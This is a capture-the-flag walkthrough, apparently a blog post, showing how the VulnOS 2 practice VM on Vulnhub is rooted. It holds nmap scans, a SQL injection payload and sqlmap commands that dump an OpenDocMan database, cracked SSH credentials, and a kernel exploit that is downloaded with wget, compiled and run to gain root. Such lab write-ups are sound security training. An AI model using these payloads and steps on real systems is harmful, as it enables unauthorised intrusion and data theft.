VulnOS: 2 Walkthrough

VulnOS: 2 is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills
This is version 2 -
Smaller, less chaotic !
As time is not always on my side, It took a long time to create another VulnOS. But I like creating them. The image is build with VBOX. Unpack the file and add it to your virtualisation software.
Your assignment is to pentest a company website, get root of the system and read the final flag
NOTE : current keyboard preferences is BE “pentesting is a wide concept”
If you have questions, feel free to contact me on m4db33f@gmail dot com Shout out to the Vulnhub Testing team!
Hope you enjoy.

Identify the IP address of VulnOS machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 12:31 EDT
Nmap scan report for 192.168.1.1
Host is up (0.036s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.4
Host is up (0.19s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Apple)
Nmap scan report for 192.168.1.7
Host is up (0.20s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.11
Host is up (0.00011s latency).
MAC Address: F4:0F:24:33:5E:D1 (Apple)
Nmap scan report for 192.168.1.13
Host is up (0.16s latency).
MAC Address: 68:37:E9:88:16:5F (Amazon Technologies)
Nmap scan report for 192.168.1.42
Host is up (0.00036s latency).
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 9.22 seconds
root@kali:~#

Identify services running on VulnOS

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.42
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 12:32 EDT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating NSE at 12:32
Completed NSE at 12:32, 0.00s elapsed
Initiating ARP Ping Scan at 12:32
Scanning 192.168.1.42 [1 port]
Completed ARP Ping Scan at 12:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:32
Completed Parallel DNS resolution of 1 host. at 12:32, 0.01s elapsed
Initiating Connect Scan at 12:32
Scanning 192.168.1.42 [65535 ports]
Discovered open port 80/tcp on 192.168.1.42
Discovered open port 22/tcp on 192.168.1.42
Discovered open port 6667/tcp on 192.168.1.42
Completed Connect Scan at 12:32, 2.82s elapsed (65535 total ports)
Initiating Service scan at 12:32
Scanning 3 services on 192.168.1.42
Completed Service scan at 12:32, 11.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.42
NSE: Script scanning 192.168.1.42.
Initiating NSE at 12:32
Completed NSE at 12:33, 60.16s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.01s elapsed
Nmap scan report for 192.168.1.42
Host is up (0.00041s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Uptime guess: 198.047 days (since Wed Nov 2 11:24:59 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.1.42
NSE: Script Post-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.47 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 16 (1.330KB)
root@kali:~#

Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))

Opening up the URL in the browser.

Lets follow along the hyperlink on the page. We are presented with another website.

The documentation tab gives away some information about a new site and its credentials.

Browsing to the above mentioned folder we reach a new page which gives away the version of the document management system.

Lets search for relevant exploits.

The exploit states that odm_user parameter is vulnerable to SQL injection.

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

Running Sqlmap to exploit and enumerate admin credentials.

root@kali:~# sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --level=5 --risk=3
Output :-
available databases [6]:
[*] drupal7
[*] information_schema
[*] jabcd0cs
[*] mysql
[*] performance_schema
[*] phpmyadmin
root@kali:~# sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables
Output :-
Database: jabcd0cs
[15 tables]
+-------------------+
| odm_access_log |
| odm_admin |
| odm_category |
| odm_data |
| odm_department |
| odm_dept_perms |
| odm_dept_reviewer |
| odm_filetypes |
| odm_log |
| odm_odmsys |
| odm_rights |
| odm_settings |
| odm_udf |
| odm_user |
| odm_user_perms |
+-------------------+
root@kali:~# sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump

Lets try and crack webmin’s credentials

Username : webmin
Password : webmin1980

Lets login to the machine

root@kali:~# ssh webmin@192.168.1.42
The authenticity of host '192.168.1.42 (192.168.1.42)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.42' (ECDSA) to the list of known hosts.
webmin@192.168.1.42's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation:  https://help.ubuntu.com/
System information as of Fri May 19 18:30:25 CEST 2017
System load: 0.0               Memory usage: 5%   Processes:       62
Usage of /: 5.7% of 29.91GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Privilege Escalation

$ python -c 'import pty;pty.spawn("/bin/bash")'
webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
webmin@VulnOSv2:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
webmin@VulnOSv2:~$ file /bin/ls
/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=cecbb9e27978d91bc6fe2cc4d46d0cd58deafdb2, stripped
webmin@VulnOSv2:~$

Searching for privilege escalation exploits using the information gathered.

Lets root the server

webmin@VulnOSv2:~$ cd /tmp
webmin@VulnOSv2:/tmp$ wget https://www.exploit-db.com/download/37292
--2017-05-19 20:06:06-- https://www.exploit-db.com/download/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: ‘37292’
100%[======================================>] 5,123       --.-K/s   in 0s
2017-05-19 20:06:07 (38.5 MB/s) - ‘37292’ saved [5123/5123]
webmin@VulnOSv2:/tmp$ ls
37292
webmin@VulnOSv2:/tmp$ mv 37292 ofs.c
webmin@VulnOSv2:/tmp$ gcc ofs.c -o ofs
webmin@VulnOSv2:/tmp$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
webmin@VulnOSv2:/tmp$ ./ofs

spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
#

Happy Hacking !!!

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.